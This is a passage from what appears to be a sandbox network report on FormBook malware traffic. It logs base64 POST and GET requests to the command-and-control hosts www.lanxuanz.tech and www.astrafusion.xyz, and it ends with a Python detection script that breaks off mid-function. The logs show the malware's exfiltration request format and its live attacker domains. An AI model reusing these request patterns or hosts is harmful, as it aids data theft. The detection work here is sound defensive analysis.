                                                                    Data Raw: 31 5a 71 44 3d 6f 6e 73 2f 65 34 49 39 65 7a 67 50 78 39 4b 30 4a 31 71 75 50 47 51 79 61 36 78 4f 57 5a 57 33 7a 35 30 2f 77 42 65 79 31 2b 65 73 33 75 56 61 4a 79 74 4b 70 38 6a 6d 39 54 2f 77 65 6f 43 50 69 72 4b 50 6a 71 57 74 41 41 55 72 59 42 37 4a 73 2f 56 51 46 4a 47 45 53 68 67 70 76 41 64 6c 58 55 56 53 38 67 71 65 30 77 79 72 46 76 77 68 31 56 43 75 57 6a 49 6e 79 5a 4e 31 55 46 76 72 79 62 38 46 6c 58 38 51 37 6f 46 34 6f 4b 4d 4d 58 71 2f 37 33 4f 46 41 51 66 78 4a 2b 58 65 32 34 50 4d 34 45 57 2f 6c 6f 41 63 74 58 64 4b 5a 7a 69 48 4c 38 42 57 47 4e 65 2f 73 37 31 47 68 63 6f 47 55 38 6f 6f 3d
                                                                    Data Ascii: 1ZqD=ons/e4I9ezgPx9K0J1quPGQya6xOWZW3z50/wBey1+es3uVaJytKp8jm9T/weoCPirKPjqWtAAUrYB7Js/VQFJGEShgpvAdlXUVS8gqe0wyrFvwh1VCuWjInyZN1UFvryb8FlX8Q7oF4oKMMXq/73OFAQfxJ+Xe24PM4EW/loActXdKZziHL8BWGNe/s71GhcoGU8oo=
                                                                    Jan 11, 2025 06:33:22.781953096 CET | 1236 | IN | HTTP/1.1 404
                                                                    Server: ZGS
                                                                    Date: Sat, 11 Jan 2025 05:33:22 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: zalb_8ae64e9492=aa11b5b9d2a4fd36a1a24567047ff52b; Path=/
                                                                    Set-Cookie: csrfc=90c63295-96eb-4623-94ab-b0d7feb8b388;path=/;priority=high
                                                                    Set-Cookie: _zcsr_tmp=90c63295-96eb-4623-94ab-b0d7feb8b388;path=/;SameSite=Strict;priority=high
                                                                    Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                    vary: accept-encoding
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 35 37 35 0d 0a 1f 8b 08 00 00 00 00 00 00 00 cc 58 5b 6f db 36 14 7e df af 60 15 b4 68 b1 28 92 25 2b 76 15 d9 c5 96 0c c5 9e 3a a0 03 86 0d 7b a1 25 ca 22 42 91 02 49 c7 4e 82 fd f7 1d 52 b2 ad 6b 93 f5 69 76 03 8b e2 b9 f1 7c df 39 24 9b bc b9 fb 72 fb fb 9f bf fd 82 0a 5d b2 f5 0f 49 fd 83 10 4a 0a 82 33 fb 64 06 25 d1 18 71 5c 92 95 23 c5 46 68 e5 a0 54 70 4d b8 5e 39 5c 50 9e 91 c3 25 e2 22 17 8c 89 bd 79 c2 32 2d e8 03 31 8f 8a d3 aa 22 da 41 de c9 9c a6 9a 91 f5 5f a2 10 89 57 3f 1f 67 18 e5 f7 48 3f 56 e0 48 93 83 f6 52 05 ae 24 61 2b 47 e9 47 46 54 41 8c a5 42 92 7c e5 78 7b b2 c9 21 0a f5 29 c7 25 65 8f ab 2f 15 e1 3f 7e c5 5c c5 73 df bf bc f6 7d e7 64 d7 6a 1f 47 f0 d9 88 ec f1 f9 3c 84 8f b1 e4 d6 86 62 c7 58 42 c6 92 73 89 14 fc b8 8a 48 9a df 0c 15 14 7d 22 f1 6c 56 1d ba 73 25 96 5b ca 63 1f de a3 ce 44 85 b3 8c f2 ed c8 cc 06 a7 f7 5b 29 76 3c 73 53 c1 84 8c 2f f2 c8 7c 5b 86 ff 39 3f 5e 69 51 dd 1a 31 f5 3c 61 25 46 6e 29 9e 5c 48 28 c1 d2 dd 4a 9c 51 80 eb 3d 23 b9 be 44 17 b9 3f [TRUNCATED]
                                                                    Data Ascii: 575X[o6~`h(%+v:{%"BINRkiv|9$r]IJ3d%q\#FhTpM^9\P%"y2-1"A_W?gH?VHR$a+GGFTAB|x{!)%e/?~\s}djG<bXBsH}"lVs%[cD[)v<sS/|[9?^iQ1<a%Fn)\H(JQ=#D?_Euu,Xyo?LSt7Ba6%?DvL1)R{7V</fKOsN{vPc}0@J0|-NeNt$E+Ca^uK0gE,0][`Zn~.^D %cT,#|K1{Q;,1oz&j5#ZIdZA@OXU0_Qcq&?!S
                                                                    Jan 11, 2025 06:33:22.781972885 CET | 729 | IN | Data Raw: c4 9a 5a 58 38 05 97 29 f2 ef 81 e3 55 a0 be 94 ef ab 5a 00 f6 d9 e7 e9 9c c0 6c 7b 93 6b ab 67 c2 34 cd ba d3 f4 2c 34 dd c7 f4 f0 bb 68 4a df 6a 53 9e 8b 89 32 b1 09 9f 4f 97 da 49 1f 31 8a fa 36 da b0 5f 7f 03 32 c3 56 c0 ad 37 cd a8 02 6d 73
                                                                    Data Ascii: ZX8)UZl{kg4,4hJjS2OI16_2V7msr$0Njq{}7Mpa [^Xw7)fGL6n0WE5<5-VI0F#)514csjq\GQ=uwOS{<,GrK


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    26 | 192.168.2.8 | 49739 | 136.143.186.12 | 80 | 5220 | C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 11, 2025 06:33:24.724750996 CET | 798 | OUT | POST /m8yb/ HTTP/1.1
                                                                    Host: www.lanxuanz.tech
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.lanxuanz.tech
                                                                    Connection: close
                                                                    Content-Length: 225
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.lanxuanz.tech/m8yb/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 6f 6e 73 2f 65 34 49 39 65 7a 67 50 77 63 36 30 4c 53 47 75 65 32 51 31 57 61 78 4f 50 4a 57 72 7a 35 34 2f 77 41 72 2f 31 4e 36 73 33 4b 52 61 62 78 31 4b 71 38 6a 6d 33 7a 2f 2f 42 59 43 49 69 71 32 70 6a 72 71 74 41 41 41 72 59 45 58 4a 73 49 35 54 46 5a 47 43 4b 52 67 72 73 77 64 6c 58 55 56 53 38 67 50 37 30 30 65 72 46 2f 67 68 31 33 36 76 56 6a 49 6b 6b 4a 4e 31 44 56 75 44 79 62 38 72 6c 57 67 36 37 71 74 34 6f 49 45 4d 58 62 2f 36 2b 4f 46 4f 65 2f 77 56 33 6d 50 79 2f 4d 49 61 4a 77 57 4b 6e 54 4d 34 66 4c 6e 7a 70 41 50 4e 2f 42 2b 74 4e 64 58 61 2b 43 62 4a 47 4c 57 6b 69 2f 39 49 66 50 6c 74 6e 38 4e 71 39 79 6f 6b 6f 74 55 4a 72 30 4b 76
                                                                    Data Ascii: 1ZqD=ons/e4I9ezgPwc60LSGue2Q1WaxOPJWrz54/wAr/1N6s3KRabx1Kq8jm3z//BYCIiq2pjrqtAAArYEXJsI5TFZGCKRgrswdlXUVS8gP700erF/gh136vVjIkkJN1DVuDyb8rlWg67qt4oIEMXb/6+OFOe/wV3mPy/MIaJwWKnTM4fLnzpAPN/B+tNdXa+CbJGLWki/9IfPltn8Nq9yokotUJr0Kv
                                                                    Jan 11, 2025 06:33:25.301229954 CET | 1236 | IN | HTTP/1.1 404
                                                                    Server: ZGS
                                                                    Date: Sat, 11 Jan 2025 05:33:25 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: zalb_8ae64e9492=d2341ff8556820e5fe7583c4c06e32ae; Path=/
                                                                    Set-Cookie: csrfc=781e121b-83c6-4b96-9eeb-9dbb57981cc6;path=/;priority=high
                                                                    Set-Cookie: _zcsr_tmp=781e121b-83c6-4b96-9eeb-9dbb57981cc6;path=/;SameSite=Strict;priority=high
                                                                    Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                    vary: accept-encoding
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 35 37 35 0d 0a 1f 8b 08 00 00 00 00 00 00 00 cc 58 5b 6f db 36 14 7e df af 60 15 b4 68 b1 28 92 25 2b 76 15 d9 c5 96 0c c5 9e 3a a0 03 86 0d 7b a1 25 ca 22 42 91 02 49 c7 4e 82 fd f7 1d 52 b2 ad 6b 93 f5 69 76 03 8b e2 b9 f1 7c df 39 24 9b bc b9 fb 72 fb fb 9f bf fd 82 0a 5d b2 f5 0f 49 fd 83 10 4a 0a 82 33 fb 64 06 25 d1 18 71 5c 92 95 23 c5 46 68 e5 a0 54 70 4d b8 5e 39 5c 50 9e 91 c3 25 e2 22 17 8c 89 bd 79 c2 32 2d e8 03 31 8f 8a d3 aa 22 da 41 de c9 9c a6 9a 91 f5 5f a2 10 89 57 3f 1f 67 18 e5 f7 48 3f 56 e0 48 93 83 f6 52 05 ae 24 61 2b 47 e9 47 46 54 41 8c a5 42 92 7c e5 78 7b b2 c9 21 0a f5 29 c7 25 65 8f ab 2f 15 e1 3f 7e c5 5c c5 73 df bf bc f6 7d e7 64 d7 6a 1f 47 f0 d9 88 ec f1 f9 3c 84 8f b1 e4 d6 86 62 c7 58 42 c6 92 73 89 14 fc b8 8a 48 9a df 0c 15 14 7d 22 f1 6c 56 1d ba 73 25 96 5b ca 63 1f de a3 ce 44 85 b3 8c f2 ed c8 cc 06 a7 f7 5b 29 76 3c 73 53 c1 84 8c 2f f2 c8 7c 5b 86 ff 39 3f 5e 69 51 dd 1a 31 f5 3c 61 25 46 6e 29 9e 5c 48 28 c1 d2 dd 4a 9c 51 80 eb 3d 23 b9 be 44 17 b9 3f [TRUNCATED]
                                                                    Data Ascii: 575X[o6~`h(%+v:{%"BINRkiv|9$r]IJ3d%q\#FhTpM^9\P%"y2-1"A_W?gH?VHR$a+GGFTAB|x{!)%e/?~\s}djG<bXBsH}"lVs%[cD[)v<sS/|[9?^iQ1<a%Fn)\H(JQ=#D?_Euu,Xyo?LSt7Ba6%?DvL1)R{7V</fKOsN{vPc}0@J0|-NeNt$E+Ca^uK0gE,0][`Zn~.^D %cT,#|K1{Q;,1oz&j5#ZIdZA@OXU0_Qcq&?!S
                                                                    Jan 11, 2025 06:33:25.301256895 CET | 729 | IN | Data Raw: c4 9a 5a 58 38 05 97 29 f2 ef 81 e3 55 a0 be 94 ef ab 5a 00 f6 d9 e7 e9 9c c0 6c 7b 93 6b ab 67 c2 34 cd ba d3 f4 2c 34 dd c7 f4 f0 bb 68 4a df 6a 53 9e 8b 89 32 b1 09 9f 4f 97 da 49 1f 31 8a fa 36 da b0 5f 7f 03 32 c3 56 c0 ad 37 cd a8 02 6d 73
                                                                    Data Ascii: ZX8)UZl{kg4,4hJjS2OI16_2V7msr$0Njq{}7Mpa [^Xw7)fGL6n0WE5<5-VI0F#)514csjq\GQ=uwOS{<,GrK


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    27 | 192.168.2.8 | 49740 | 136.143.186.12 | 80 | 5220 | C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 11, 2025 06:33:27.349263906 CET | 1815 | OUT | POST /m8yb/ HTTP/1.1
                                                                    Host: www.lanxuanz.tech
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.lanxuanz.tech
                                                                    Connection: close
                                                                    Content-Length: 1241
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.lanxuanz.tech/m8yb/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 6f 6e 73 2f 65 34 49 39 65 7a 67 50 77 63 36 30 4c 53 47 75 65 32 51 31 57 61 78 4f 50 4a 57 72 7a 35 34 2f 77 41 72 2f 31 4e 79 73 33 66 46 61 59 52 4a 4b 72 38 6a 6d 30 7a 2f 38 42 59 44 4e 69 72 65 31 6a 72 6e 59 41 43 34 72 5a 6d 66 4a 39 74 4e 54 50 5a 47 43 57 68 67 6f 76 41 64 56 58 56 6c 4f 38 67 66 37 30 30 65 72 46 35 6b 68 33 6c 43 76 54 6a 49 6e 79 5a 4e 44 55 46 75 34 79 62 30 64 6c 57 6b 41 38 61 4e 34 6f 6f 55 4d 45 35 48 36 6d 65 46 4d 5a 2f 77 64 33 6d 44 39 2f 49 51 38 4a 30 66 58 6e 54 6b 34 4f 74 69 2b 2b 79 6e 50 70 33 2b 44 4c 61 50 35 67 31 54 77 62 4e 72 66 6a 75 51 79 59 76 39 46 75 4f 55 6e 32 46 31 4c 78 70 6b 6f 73 44 50 6a 74 76 4f 6e 72 7a 77 55 63 6d 6a 71 51 30 6d 4f 4a 4b 64 4f 63 65 45 36 38 31 56 61 47 43 33 77 6a 2b 72 61 62 6e 33 76 2f 44 6c 4b 39 53 55 54 53 53 4b 73 31 38 5a 68 64 57 63 2f 56 6e 65 79 42 74 35 44 53 6f 79 55 66 2f 73 6e 56 43 44 42 38 48 4c 4b 42 34 70 4b 38 6c 4e 4c 37 51 7a 58 4b 45 6f 6f 41 63 48 42 2f 79 51 4f 52 45 39 34 75 [TRUNCATED]
                                                                    Data Ascii: 1ZqD=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 [TRUNCATED]
                                                                    Jan 11, 2025 06:33:27.927623034 CET | 549 | IN | HTTP/1.1 400
                                                                    Server: ZGS
                                                                    Date: Sat, 11 Jan 2025 05:33:27 GMT
                                                                    Content-Type: text/html;charset=ISO-8859-1
                                                                    Content-Length: 80
                                                                    Connection: close
                                                                    Set-Cookie: zalb_8ae64e9492=d2341ff8556820e5fe7583c4c06e32ae; Path=/
                                                                    Set-Cookie: csrfc=ac5e5068-c606-448c-bb18-e7f860599f9f;path=/;priority=high
                                                                    Set-Cookie: _zcsr_tmp=ac5e5068-c606-448c-bb18-e7f860599f9f;path=/;SameSite=Strict;priority=high
                                                                    Set-Cookie: JSESSIONID=D9287213F14402682A4C7F212B38524D; Path=/; HttpOnly
                                                                    Data Raw: 7b 22 72 65 73 70 6f 6e 73 65 5f 63 6f 64 65 22 3a 22 34 30 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 22 31 22 2c 22 64 65 76 65 6c 6f 70 65 72 5f 6d 65 73 73 61 67 65 22 3a 22 49 6e 76 61 6c 69 64 20 69 6e 70 75 74 2e 22 7d 0a 0a
                                                                    Data Ascii: {"response_code":"400","status_code":"1","developer_message":"Invalid input."}


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    28 | 192.168.2.8 | 49741 | 136.143.186.12 | 80 | 5220 | C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 11, 2025 06:33:29.892448902 CET | 515 | OUT | GET /m8yb/?1ZqD=llEfdMF3fC5v4v2APCHuOWcZRuF4MZ+X2MJb9QaOtduFh6ZmbzwgisfO5x3/A5+hir6Uv7mlcSwuThCcifsMM+utKUlvw3RLEUBt7B2DyxaXSuE2zij4fUwZyaVVEgXhww==&dbFX6=JLnL0 HTTP/1.1
                                                                    Host: www.lanxuanz.tech
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Jan 11, 2025 06:33:30.481340885 CET | 1236 | IN | HTTP/1.1 404
                                                                    Server: ZGS
                                                                    Date: Sat, 11 Jan 2025 05:33:30 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 4641
                                                                    Connection: close
                                                                    Set-Cookie: zalb_8ae64e9492=cd858cf068bec389eea549b00143a3a9; Path=/
                                                                    Set-Cookie: csrfc=e5167ea5-e077-4538-b2be-e221d027850e;path=/;priority=high
                                                                    Set-Cookie: _zcsr_tmp=e5167ea5-e077-4538-b2be-e221d027850e;path=/;SameSite=Strict;priority=high
                                                                    Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                    vary: accept-encoding
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 5a 6f 68 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 77 65 62 66 6f 6e 74 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 36 30 30 22 3e 0a 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 0a 20 20 20 20 20 20 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet" /> <title>Zoho</title> <link type="text/css" rel="stylesheet" href="/webfonts?family=Open+Sans:400,600"> <style> body{ font-family:"Open Sans", sans-serif; font-size:11px; margin:0px; padding:0px; background-color:#f5f5f5; } .topColors{ background: -moz-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background: -webkit-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50
                                                                    Jan 11, 2025 06:33:30.481381893 CET | 1236 | IN | Data Raw: 25 2c 20 23 30 30 38 36 64 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 37 35 25 2c 20 23 66 64 63 30 30 30 20 37 35 25 2c 23 66 64 63 30 30 30 20 31 30 30 25 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a
                                                                    Data Ascii: %, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background-size:452px auto;height:3px; } .mainContainer{ width:1000px; margin:0px auto; } .logo{ margin
                                                                    Jan 11, 2025 06:33:30.481394053 CET | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 68 33 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4f 70 65 6e 20 53 61 6e 73 22 3b 0a 20 20 20 20
                                                                    Data Ascii: h3{ font-size:18px; font-family: "Open Sans"; font-weight:normal; font-weight:600; } .weight400{ font-weight:400; } .domain-color{
                                                                    Jan 11, 2025 06:33:30.481417894 CET | 1236 | IN | Data Raw: 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 32 29 3b 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b
                                                                    Data Ascii: rgba(0, 0, 0, 0.12); color: #ffffff; font-size: 18px; font-weight: 300; padding: 10px 20px; text-decoration: none; position:relative; } </style
                                                                    Jan 11, 2025 06:33:30.481427908 CET | 223 | IN | Data Raw: 63 6f 6e 74 61 69 6e 65 72 22 3e 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 77 69 64 74 68 3d 22 37 30 30 70 78 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 7a 6f 68 6f 2e 63 6f 6d 2f 73 69 74 65
                                                                    Data Ascii: container"> <img width="700px" src="https://www.zoho.com/sites/images/professionally-crafted-themes.png" style="margin-top: 15px"> </div> </div> </div> </body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    29 | 192.168.2.8 | 49742 | 199.192.21.169 | 80 | 5220 | C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 11, 2025 06:33:36.068542957 CET | 784 | OUT | POST /pcck/ HTTP/1.1
                                                                    Host: www.astrafusion.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.astrafusion.xyz
                                                                    Connection: close
                                                                    Content-Length: 205
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.astrafusion.xyz/pcck/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 78 6c 30 55 45 63 70 6c 67 6f 58 63 51 5a 39 74 6a 6f 67 67 43 64 51 2b 72 47 70 69 74 71 65 30 65 53 63 39 76 68 54 4c 66 43 79 53 48 65 69 55 53 6b 30 39 41 52 63 6b 67 4f 36 5a 79 6d 6e 30 45 54 68 55 55 44 63 65 4e 7a 4c 77 50 52 61 6a 6e 73 72 68 33 4f 74 4a 66 70 43 2b 7a 53 51 6f 6f 65 52 67 54 58 45 57 2b 79 79 43 4b 4f 68 55 6a 48 4c 2b 6a 74 68 34 72 50 68 53 48 74 4f 2b 41 68 77 4d 74 46 6e 75 73 6c 6f 42 53 49 64 67 58 2b 4e 65 50 58 41 38 31 31 4a 55 5a 34 57 6e 39 39 35 78 56 36 76 54 37 62 6b 2b 47 35 78 69 53 4b 57 39 47 78 35 74 75 46 43 6e 4c 52 32 59 31 51 39 55 4f 48 6f 3d
                                                                    Data Ascii: 1ZqD=xl0UEcplgoXcQZ9tjoggCdQ+rGpitqe0eSc9vhTLfCySHeiUSk09ARckgO6Zymn0EThUUDceNzLwPRajnsrh3OtJfpC+zSQooeRgTXEW+yyCKOhUjHL+jth4rPhSHtO+AhwMtFnusloBSIdgX+NePXA811JUZ4Wn995xV6vT7bk+G5xiSKW9Gx5tuFCnLR2Y1Q9UOHo=
                                                                    Jan 11, 2025 06:33:36.708457947 CET | 918 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Sat, 11 Jan 2025 05:33:36 GMT
                                                                    Server: Apache
                                                                    Content-Length: 774
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>
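The POST above carries the traits a network analyst would key on when triaging this sample's traffic: a form-urlencoded body made of one short key and a base64 blob, a Referer that points back at the POST target itself, a short trailing-slash path, and a legacy IE7 User-Agent on a Windows 7 host, answered by a decoy-looking 404. The following Python is an added example, not code from the Joe Sandbox report or from FormBook: it parses a raw HTTP request and scores those indicators. The sample request is reconstructed from the headers and body printed above; the request line (`POST /pcck/`) and the `Host` header are assumptions, since the report excerpt does not show them, and the benign login request is constructed for contrast.

```python
"""Heuristic indicators for a FormBook-style HTTP POST (added example)."""
import base64
import binascii
import math
import re
from collections import Counter
from urllib.parse import urlsplit

# User-Agent as printed in the report (IE7 / Windows 7 / WOW64).
LEGACY_UA = re.compile(
    r"Mozilla/4\.0 \(compatible; MSIE 7\.0; Windows NT 6\.1; WOW64; Trident/5\.0")

# Constructed sample: headers and body from the report; request line and Host assumed.
SAMPLE_REQUEST = "\r\n".join([
    "POST /pcck/ HTTP/1.1",                     # assumption
    "Host: www.astrafusion.xyz",                # assumption (taken from the Referer)
    "Content-Type: application/x-www-form-urlencoded",
    "Referer: http://www.astrafusion.xyz/pcck/",
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; "
    "SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
    "Media Center PC 6.0; .NET4.0C; .NET4.0E)",
    "",
    "1ZqD=xl0UEcplgoXcQZ9tjoggCdQ+rGpitqe0eSc9vhTLfCySHeiUSk09ARckgO6Zymn0EThUUDceNzLwPRaj"
    "nsrh3OtJfpC+zSQooeRgTXEW+yyCKOhUjHL+jth4rPhSHtO+AhwMtFnusloBSIdgX+NePXA811JUZ4Wn995x"
    "V6vT7bk+G5xiSKW9Gx5tuFCnLR2Y1Q9UOHo=",
])

# Constructed benign request for contrast (hypothetical host and form).
BENIGN_REQUEST = "\r\n".join([
    "POST /login HTTP/1.1",
    "Host: intranet.example",
    "Content-Type: application/x-www-form-urlencoded",
    "Referer: https://intranet.example/login.html",
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0",
    "",
    "user=alice&password=hunter2&remember=1",
])


def parse_request(raw: str):
    """Split a raw HTTP/1.x request into (method, path, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    parts = lines[0].split(" ", 2)
    if len(parts) != 3:
        raise ValueError("malformed request line: %r" % lines[0])
    method, path, _version = parts
    headers = {}
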